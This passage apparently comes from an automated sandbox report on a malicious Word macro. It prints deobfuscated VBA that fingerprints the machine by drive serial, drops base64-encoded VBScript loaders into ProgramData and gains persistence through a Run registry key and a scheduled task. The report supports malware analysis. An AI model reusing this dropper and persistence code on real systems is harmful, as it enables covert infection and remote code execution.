157	rc = HttpRequest.StatusText	StatusText
158	If rc = "OK" Then
159	sendFormData = True
160	Else
161	sendFormData = False
162	Endif
162	EndNow:
164	Set HttpRequest = Nothing
165	End Function

Function cuid, APIs: 19, Strings: 4, Number of lines: 16, Relevance: 50.016

APIs	Meta Information
CreateObject	CreateObject("Scripting.FileSystemObject")
GetDriveName
GetSpecialFolder
GetDrive
SerialNumber
Part of subcall function AL8vhpb5hk3w@NewMacros: CreateObject
Part of subcall function AL8vhpb5hk3w@NewMacros: Chr
Part of subcall function AL8vhpb5hk3w@NewMacros: CreateElement
Part of subcall function AL8vhpb5hk3w@NewMacros: Chr
Part of subcall function AL8vhpb5hk3w@NewMacros: dataType
Part of subcall function AL8vhpb5hk3w@NewMacros: Chr
Part of subcall function AL8vhpb5hk3w@NewMacros: nodeTypedValue
Part of subcall function AL8vhpb5hk3w@NewMacros: Text
Mid
Part of subcall function clearStr@NewMacros: CreateObject
Part of subcall function clearStr@NewMacros: ignoreCase
Part of subcall function clearStr@NewMacros: Global
Part of subcall function clearStr@NewMacros: Pattern
Part of subcall function clearStr@NewMacros: Replace

Strings	Decrypted Strings
"1"
"1"
"Scripting.FileSystemObject"
""""

Line	Instruction	Meta Information
114	Function cuid() as String
115	On Error Resume Next	executed
116	Dim giac
116	giac = "1"
117	Dim uuid
117	uuid = "1"
119	Dim FSO, D, Serial
120	Set FSO = CreateObject("Scripting.FileSystemObject")	CreateObject("Scripting.FileSystemObject") executed
121	strDrive = FSO.GetDriveName(FSO.GetSpecialFolder(0))	GetDriveName GetSpecialFolder
122	Set D = FSO.GetDrive(strDrive)	GetDrive
123	Serial = D.SerialNumber	SerialNumber
125	Dim result as String
126	result = AL8vhpb5hk3w("" & Serial)
127	result = Mid(clearStr(result), 1, 20)	Mid
128	cuid = uuid & "." & giac & "." & result
129	End Function

Function AP6fuezipn4, APIs: 20, Strings: 2, Number of lines: 14, Relevance: 48.014

APIs	Meta Information
CreateObject	CreateObject("Msxml2.DOMDocument.3.0")
Chr
CreateElement
Chr
dataType
Chr
Text
Part of subcall function AV0kftndmk@NewMacros: CreateObject
Part of subcall function AV0kftndmk@NewMacros: Chr
Part of subcall function AV0kftndmk@NewMacros: Type
Part of subcall function AV0kftndmk@NewMacros: AT6yshkqzy
Part of subcall function AV0kftndmk@NewMacros: Open
Part of subcall function AV0kftndmk@NewMacros: Write
Part of subcall function AV0kftndmk@NewMacros: Position
Part of subcall function AV0kftndmk@NewMacros: Type
Part of subcall function AV0kftndmk@NewMacros: AS9fvfrob
Part of subcall function AV0kftndmk@NewMacros: Charset
Part of subcall function AV0kftndmk@NewMacros: Chr
Part of subcall function AV0kftndmk@NewMacros: ReadText
nodeTypedValue

Strings	Decrypted Strings
""""
""""

Line	Instruction	Meta Information
32	Function AP6fuezipn4(ByVal AQ4ilbevk2j)
33	Dim AM1wg7xyr, AN9vxh3lbsda	executed
34	Set AM1wg7xyr = CreateObject((Chr(10 + 67) & Chr(85 + 30) & Chr(85 + 35) & Chr(- 97 + 206) & Chr(- 64 + 172) & Chr(61 + - 11) & Chr(- 42 + 88) & Chr(- 77 + 145) & Chr(- 93 + 172) & Chr(- 52 + 129) & Chr(39 + 29) & Chr(87 + 24) & Chr(- 70 + 169) & Chr(- 33 + 150) & Chr(12 + 97) & Chr(- 13 + 114) & Chr(33 + 77) & Chr(- 22 + 138) & Chr(- 65 + 111) & Chr(27 + 24) & Chr(68 + - 22) & Chr(71 + - 23)))	CreateObject("Msxml2.DOMDocument.3.0") Chr executed
35	Set AN9vxh3lbsda = AM1wg7xyr.CreateElement((Chr(5 + 93) & Chr(- 68 + 165) & Chr(51 + 64) & Chr(92 + 9) & Chr(- 100 + 154) & Chr(46 + 6)))	CreateElement Chr
36	AN9vxh3lbsda.dataType = (Chr(67 + 31) & Chr(- 17 + 122) & Chr(4 + 106) & Chr(- 51 + 97) & Chr(- 9 + 107) & Chr(78 + 19) & Chr(97 + 18) & Chr(- 27 + 128) & Chr(48 + 6) & Chr(54 + - 2))	dataType Chr
37	AN9vxh3lbsda.Text = AQ4ilbevk2j	Text
38	If AQ4ilbevk2j = "" Then
39	AP6fuezipn4 = ""
40	Else
41	AP6fuezipn4 = AV0kftndmk(AN9vxh3lbsda.nodeTypedValue)	nodeTypedValue
42	Endif
43	Set AN9vxh3lbsda = Nothing
44	Set AM1wg7xyr = Nothing
45	End Function

Subroutine SetRegData, APIs: 5, Strings: 7, Number of lines: 14, Relevance: 44.014

APIs	Meta Information
CreateObject	CreateObject("WScript.Shell")
ExpandEnvironmentStrings	IWshShell3.ExpandEnvironmentStrings("%WINDIR%") -> C:\Windows
ExpandEnvironmentStrings	IWshShell3.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") -> C:\ProgramData
RegWrite
Run	IWshShell3.Run("schtasks /create /tn "SysChecks" /tr ""C:\Windows\System32\WScript.exe" "C:\ProgramData\TransbaseOdbcDriver\starter.vbs"" /sc minute /mo 30",0,False)

Strings	Decrypted Strings
"WScript.Shell"
"%WINDIR%"
"%ALLUSERSPROFILE%"
""""
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TransbaseOdbcDriver"
"REG_SZ"
"schtasks /create /tn ""SysChecks"" /tr """

Line	Instruction	Meta Information
565	Private Sub SetRegData()
566	On Error Resume Next	executed
567	Set sh = CreateObject("WScript.Shell")	CreateObject("WScript.Shell") executed
568	Dim wscript_pthpath
568	wscript_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\System32\WScript.exe"	IWshShell3.ExpandEnvironmentStrings("%WINDIR%") -> C:\Windows executed
569	Dim run_pth_scr
569	run_pth_scr = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") + "\TransbaseOdbcDriver" + "\starter.vbs"	IWshShell3.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") -> C:\ProgramData executed
570	Dim run_pth
570	run_pth = """" & wscript_pthpath & """ """ & run_pth_scr & """"
571	On Error Resume Next
572	sh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TransbaseOdbcDriver", run_pth, "REG_SZ"	RegWrite
573	On Error Resume Next
574	sh.Run "schtasks /create /tn ""SysChecks"" /tr """ & run_pth & """ /sc minute /mo 30", 0, False	IWshShell3.Run("schtasks /create /tn "SysChecks" /tr ""C:\Windows\System32\WScript.exe" "C:\ProgramData\TransbaseOdbcDriver\starter.vbs"" /sc minute /mo 30",0,False) executed
575	End Sub

Subroutine ggl_runer, APIs: 14, Strings: 3, Number of lines: 27, Relevance: 42.027

APIs	Meta Information
CreateObject	CreateObject("WScript.Shell")
ExpandEnvironmentStrings	IWshShell3.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") -> C:\ProgramData
Part of subcall function CreateDir@NewMacros: Dir
Part of subcall function CreateDir@NewMacros: vbDirectory
Part of subcall function CreateDir@NewMacros: MkDir
FreeFile
Part of subcall function AP6fuezipn4@NewMacros: CreateObject
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: CreateElement
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: dataType
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: Text
Part of subcall function AP6fuezipn4@NewMacros: nodeTypedValue

Strings	Decrypted Strings
"RGltIG9iakZTTywgb2JqU2hlbGwsIHN0ckZpbGUsIFJlYWRBbGxUZXh0RmlsZQ0KU2V0IG9iakZT"
"WScript.Shell"
"%ALLUSERSPROFILE%"

Line	Instruction	Meta Information
195	Sub ggl_runer()
196	On Error Resume Next	executed
197	Dim f
197	f = "RGltIG9iakZTTywgb2JqU2hlbGwsIHN0ckZpbGUsIFJlYWRBbGxUZXh0RmlsZQ0KU2V0IG9iakZT"
198	f = f & "TyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKQ0KU2V0IG9ialNo"
199	f = f & "ZWxsID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoICJXU2NyaXB0LlNoZWxsIiApDQpzdHJGaWxlID0g"
200	f = f & "b2JqU2hlbGwuRXhwYW5kRW52aXJvbm1lbnRTdHJpbmdzKCIlQUxMVVNFUlNQUk9GSUxFJVxUcmFu"
201	f = f & "c2Jhc2VPZGJjRHJpdmVyXExhbkNyYWREcml2ZXIuaW5pIikNClNldCBvYmpGaWxlID0gb2JqRlNP"
202	f = f & "Lk9wZW5UZXh0RmlsZShzdHJGaWxlLDEsZmFsc2UsLTEpDQpJZiBvYmpGaWxlLkF0RW5kT2ZTdHJl"
203	f = f & "YW0gVGhlbg0KCVJlYWRBbGxUZXh0RmlsZSA9ICIiDQpFbHNlDQoJUmVhZEFsbFRleHRGaWxlID0g"
204	f = f & "b2JqRmlsZS5SZWFkQWxsDQpFbmQgSWYNCm9iakZpbGUuQ2xvc2UNCkV4ZWN1dGVHbG9iYWwgUmVh"
205	f = f & "ZEFsbFRleHRGaWxl"
207	Set sh = CreateObject("WScript.Shell")	CreateObject("WScript.Shell") executed
208	Dim FileNumber, figName
209	Dim WorkPath as String
210	WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	IWshShell3.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") -> C:\ProgramData executed
211	WorkPath = WorkPath & "\TransbaseOdbcDriver"
212	Dim statMkDir as Boolean
213	statMkDir = CreateDir(WorkPath)
214	If statMkDir Then
215	FileNumber = FreeFile	FreeFile
216	figName = WorkPath & "\LanCradDriver.vbs"
217	Open figName For Output As # FileNumber
218	Print # FileNumber, AP6fuezipn4(f)
219	Close # FileNumber
220	Endif
221	End Sub

Subroutine ggl_starter, APIs: 14, Strings: 3, Number of lines: 23, Relevance: 42.023

APIs	Meta Information
CreateObject	CreateObject("WScript.Shell")
ExpandEnvironmentStrings	IWshShell3.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") -> C:\ProgramData
Part of subcall function CreateDir@NewMacros: Dir
Part of subcall function CreateDir@NewMacros: vbDirectory
Part of subcall function CreateDir@NewMacros: MkDir
FreeFile
Part of subcall function AP6fuezipn4@NewMacros: CreateObject
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: CreateElement
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: dataType
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: Text
Part of subcall function AP6fuezipn4@NewMacros: nodeTypedValue

Strings	Decrypted Strings
"RGltIG9ialNoZWxsLHBhdGgNClNldCBvYmpTaGVsbCA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCAi"
"WScript.Shell"
"%ALLUSERSPROFILE%"

Line	Instruction	Meta Information
223	Sub ggl_starter()
224	On Error Resume Next	executed
225	Dim f
225	f = "RGltIG9ialNoZWxsLHBhdGgNClNldCBvYmpTaGVsbCA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCAi"
226	f = f & "V1NjcmlwdC5TaGVsbCIgKQ0KcGF0aCA9IG9ialNoZWxsLkV4cGFuZEVudmlyb25tZW50U3RyaW5n"
227	f = f & "cygiJUFMTFVTRVJTUFJPRklMRSVcVHJhbnNiYXNlT2RiY0RyaXZlclxUcmFuc2Jhc2VPZGJjRHJp"
228	f = f & "dmVyLmpzIikNCnBhdGggPSAiY21kLmV4ZSAvayB3c2NyaXB0LmV4ZSAiIiIgJiBwYXRoICYgIiIi"
229	f = f & "Ig0Kb2JqU2hlbGwuUnVuIHBhdGgsIDAsIHRydWUgDQpTZXQgb2JqU2hlbGwgPSBOb3RoaW5n"
230	Set sh = CreateObject("WScript.Shell")	CreateObject("WScript.Shell") executed
231	Dim FileNumber, figName
232	Dim WorkPath as String
233	WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	IWshShell3.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") -> C:\ProgramData executed
234	WorkPath = WorkPath & "\TransbaseOdbcDriver"
235	Dim statMkDir as Boolean
236	statMkDir = CreateDir(WorkPath)
237	If statMkDir Then
238	FileNumber = FreeFile	FreeFile
239	figName = WorkPath & "\starter.vbs"
240	Open figName For Output As # FileNumber
241	Print # FileNumber, AP6fuezipn4(f)
242	Close # FileNumber
243	Endif
244	End Sub

Function AL8vhpb5hk3w, APIs: 21, Strings: 0, Number of lines: 10, Relevance: 40.26

APIs	Meta Information
CreateObject	CreateObject("Msxml2.DOMDocument.3.0")
Chr
CreateElement
Chr
dataType
Chr
nodeTypedValue
Part of subcall function AR4ql6nqd@NewMacros: CreateObject
Part of subcall function AR4ql6nqd@NewMacros: Chr
Part of subcall function AR4ql6nqd@NewMacros: Type
Part of subcall function AR4ql6nqd@NewMacros: AS9fvfrob
Part of subcall function AR4ql6nqd@NewMacros: Charset
Part of subcall function AR4ql6nqd@NewMacros: Chr
Part of subcall function AR4ql6nqd@NewMacros: Open
Part of subcall function AR4ql6nqd@NewMacros: WriteText
Part of subcall function AR4ql6nqd@NewMacros: Position
Part of subcall function AR4ql6nqd@NewMacros: Type
Part of subcall function AR4ql6nqd@NewMacros: AT6yshkqzy
Part of subcall function AR4ql6nqd@NewMacros: Position
Part of subcall function AR4ql6nqd@NewMacros: Read
Text

Line	Instruction	Meta Information
21	Function AL8vhpb5hk3w(AO3opbjnrp9)
22	Dim AM1wg7xyr, AN9vxh3lbsda	executed
23	Set AM1wg7xyr = CreateObject((Chr(- 57 + 134) & Chr(- 21 + 136) & Chr(- 26 + 146) & Chr(83 + 26) & Chr(- 76 + 184) & Chr(91 + - 41) & Chr(32 + 14) & Chr(15 + 53) & Chr(- 16 + 95) & Chr(- 69 + 146) & Chr(20 + 48) & Chr(- 81 + 192) & Chr(97 + 2) & Chr(29 + 88) & Chr(23 + 86) & Chr(26 + 75) & Chr(- 28 + 138) & Chr(- 5 + 121) & Chr(54 + - 8) & Chr(10 + 41) & Chr(74 + - 28) & Chr(45 + 3)))	CreateObject("Msxml2.DOMDocument.3.0") Chr executed
24	Set AN9vxh3lbsda = AM1wg7xyr.CreateElement((Chr(- 90 + 188) & Chr(52 + 45) & Chr(7 + 108) & Chr(- 17 + 118) & Chr(- 53 + 107) & Chr(0 + 52)))	CreateElement Chr
25	AN9vxh3lbsda.dataType = (Chr(- 91 + 189) & Chr(- 44 + 149) & Chr(- 63 + 173) & Chr(61 + - 15) & Chr(- 85 + 183) & Chr(5 + 92) & Chr(28 + 87) & Chr(100 + 1) & Chr(100 + - 46) & Chr(34 + 18))	dataType Chr
26	AN9vxh3lbsda.nodeTypedValue = AR4ql6nqd(AO3opbjnrp9)	nodeTypedValue
27	AL8vhpb5hk3w = AN9vxh3lbsda.Text	Text
28	Set AN9vxh3lbsda = Nothing
29	Set AM1wg7xyr = Nothing
30	End Function

Function AV0kftndmk, APIs: 12, Strings: 0, Number of lines: 14, Relevance: 29.764

APIs	Meta Information
CreateObject	CreateObject("ADODB.Stream")
Chr
Type
AT6yshkqzy
Open	Stream.Open()
Write	Stream.Write(???) Stream.Write(?????????????????????????4????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????) Stream.Write(???????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????\xfffd\xfffd??????????????????????4?????????) Stream.Write(?????????????????????????????????????????????????????????????4??????????????????????????????????????????????????????????????/???????????????\xfffd?????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????\xfffd???????????????????????????????\xfffd?????4????\xfffd????????????????????????\xfffd\xfffd????????\xfffd?????????????????????\xfffd????????????????\xfffd\xfffd\xfffd????????????????\xfffd\xfffd??'?????????????\xfffd\xfffd\xfffd?????????????????\xfffd\xfffd\xfffd??????????\xfffd\xfffd??'?????????????'????\xfffd\xfffd\xfffd??????'\xfffd?????????????\xfffd\xfffd\xfffd??????\xfffd????\xfffd\xfffd\xfffd??????????\xfffd\xfffd\xfffd\xfffd??????????\xfffd\xfffd??????????????\xfffd\xfffd\xfffd\xfffd??????\xfffd\xfffd\xfffd???\xfffd\xfffd\xfffd???????4???????????????????????????????????????????????????????????\xfffd????\xfffd?????????????\xfffd???????????????????????????????\xfffd?????4????\xfffd????????????\xfffd\xfffd???????????????\xfffd????????\xfffd\xfffd??4????????????????????????\xfffd\xfffd????????????????\xfffd\xfffd?????????????????????????\xfffd\xfffd\xfffd?????????????????????????\xfffd\xfffd?????????????????????????\xfffd\xfffd\xfffd??????????????????????????\xfffd\xfffd\xfffd??????????????????\xfffd\xfffd??'???????????????????\xfffd\xfffd???????????????????\xfffd\xfffd\xfffd???????4?????????????????\xfffd\xfffd??????????\xfffd\xfffd\xfffd\xfffd???????4???????????????\xfffd\xfffd\xfffd??\xfffd\xfffd??????????\xfffd\xfffd\xfffd\xfffd???????4???????????????\xfffd\xfffd\xfffd???\xfffd\xfffd???\xfffd\xfffd?????????????????????\xfffd\xfffd??????????????\xfffd???????????????????\xfffd??????\xfffd???????????\xfffd?????????????????????\xfffd\xfffd?????4?????\xfffd\xfffd???????????????????????\xfffd\xfffd\xfffd?????????????????\xfffd\xfffd\xfffd????????\xfffd\xfffd\xfffd\xfffd???4??????????????\xfffd\xfffd\xfffd???????????\xfffd????????\xfffd\xfffd\xfffd?????????????????????????\xfffd\xfffd\xfffd\xfffd???4?????????????\xfffd???????\xfffd\xfffd??????\xfffd\xfffd\xfffd??????????????????????????\xfffd\xfffd\xfffd?????????????????????\xfffd???????\xfffd\xfffd\xfffd?????????????????????????\xfffd\xfffd\xfffd???\xfffd\xfffd???\xfffd\xfffd?????????????\xfffd???????????????????\xfffd??????\xfffd???????????\xfffd\xfffd?????????\xfffd\xfffd??????\xfffd\xfffd???????'?????\xfffd?????????????????\xfffd\xfffd\xfffd????????????????\xfffd\xfffd?????????\xfffd\xfffd\xfffd??????????????????\xfffd\xfffd\xfffd\xfffd???\xfffd\xfffd\xfffd???????????\xfffd???????\xfffd\xfffd\xfffd\xfffd?????????????????\xfffd\xfffd\xfffd???????????????????????????????\xfffd\xfffd\xfffd\xfffd?????\xfffd\xfffd??????\xfffd\xfffd\xfffd?'???????????????\xfffd\xfffd\xfffd\xfffd?????????????????\xfffd\xfffd\xfffd?????????????????????????????????????????\xfffd\xfffd\xfffd\xfffd?????\xfffd\xfffd????\xfffd????\xfffd??????????????????????????????????????????????????????????????????????????????????????????\xfffd\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????4???????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd\xfffd\xfffd\xfffd?????????????\xfffd\xfffd\xfffd\xfffd??????7???????????????????????\xfffd\xfffd\xfffd\xfffd????????????????????????????\xfffd\xfffd\xfffd\xfffd????????????????????????\xfffd\xfffd\xfffd\xfffd?????????????????????\xfffd\xfffd\xfffd????????????\xfffd\xfffd\xfffd\xfffd???????8????\xfffd\xfffd\xfffd??????????????????\xfffd\xfffd\xfffd\xfffd????????????????????????????????????????\xfffd\xfffd\xfffd????????????????????????????????????????????????????????????????????????????????????????\xfffd\xfffd\xfffd\xfffd???????????????????????\xfffd\xfffd\xfffd?????\xfffd\xfffd\xfffd??????????\xfffd\xfffd\xfffd\xfffd?????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd?????????????????????4??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????=???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????4????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'????????????????????????????????????????????????????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????????????????????????????????'?????????????????????????????????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd???????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd??????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??????????????????????????????\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd??????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd???????????????????????????\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd?????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??????????????\xfffd??????????????????????????????????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??????????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd???????\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd???????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??Z???????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??Z????????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd???????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd???\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd???????\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??????????\xfffd????????\xfffd????????????????????????????????????????\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd???????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????????????????\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??Z???????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd???????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd???4???????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd???????????\xfffd??????\xfffd?????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??\xfffd\xfffd\xfffd\xfffd???\xfffd\xfffd\xfffd\xfffd?????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd???\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??Z??????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????7???????????????????????????????????????\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd?????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??????????????????\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd??????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd????????????????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd?????????\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd??\xfffd\xfffd\xfffd???\xfffd\xfffd\xfffd\xfffd???????????????????????????????????????????????????????????????????????????????????????????????\xfffd\xfffd\xfffd??\xfffd\xfffd\xfffd\xfffd????????????????????????????????????????????????????????????????????????????????????????\xfffd\xfffd\xfffd??????????????????????????\xfffd???????????????????:???\xfffd??4?????\xfffd???????????4??\xfffd???\xfffd????7?????????????????????????????????????????????????????????????4?\xfffd??????\xfffd??????????????\xfffd??????????????\xfffd???4???????\xfffd???4???????\xfffd??7????????????4????????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????4?????????????????4???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????4??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??????????????????????????????????????????????????????????????????????????????7?????????????????????????????????????????????????????????????????????????????4??????????=??????????????????????????????????????????????????????????????????????4???????????????????????????????????????????????????????????????????????????????????????7????????????????????7????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????8?????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????7?????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????8???????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????=???????????????\xfffd????????????????????????????????????????????????????????????????????????????4???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????/???????????????????????????????????????4???????????????????????????????????????????????4????????????????????????)
Position
Type
AS9fvfrob
Charset
Chr
ReadText

Line	Instruction	Meta Information
63	Function AV0kftndmk(Binary)
64	Const AS9fvfrob = 2	executed
65	Const AT6yshkqzy = 1
66	Dim AU3sjrvsqt3j
67	Set AU3sjrvsqt3j = CreateObject((Chr(- 6 + 71) & Chr(89 + - 21) & Chr(52 + 27) & Chr(61 + 7) & Chr(39 + 27) & Chr(- 9 + 55) & Chr(56 + 27) & Chr(- 52 + 168) & Chr(39 + 75) & Chr(5 + 96) & Chr(57 + 40) & Chr(22 + 87)))	CreateObject("ADODB.Stream") Chr executed
68	AU3sjrvsqt3j.Type = AT6yshkqzy	Type AT6yshkqzy
69	AU3sjrvsqt3j.Open	Stream.Open() executed
70	AU3sjrvsqt3j.Write Binary	Stream.Write(???) executed
71	AU3sjrvsqt3j.Position = 0	Position
72	AU3sjrvsqt3j.Type = AS9fvfrob	Type AS9fvfrob
73	AU3sjrvsqt3j.Charset = (Chr(8 + 109) & Chr(- 23 + 138) & Chr(1 + 44) & Chr(- 78 + 175) & Chr(39 + 76) & Chr(- 16 + 115) & Chr(- 80 + 185) & Chr(92 + 13))	Charset Chr
74	AV0kftndmk = AU3sjrvsqt3j.ReadText	ReadText
75	Set AU3sjrvsqt3j = Nothing
76	End Function

Function AR4ql6nqd, APIs: 13, Strings: 0, Number of lines: 15, Relevance: 28.015

APIs	Meta Information
CreateObject	CreateObject("ADODB.Stream")
Chr
Type
AS9fvfrob
Charset
Chr
Open	Stream.Open()
WriteText
Position
Type
AT6yshkqzy
Position
Read

Line	Instruction	Meta Information
47	Function AR4ql6nqd(Text)
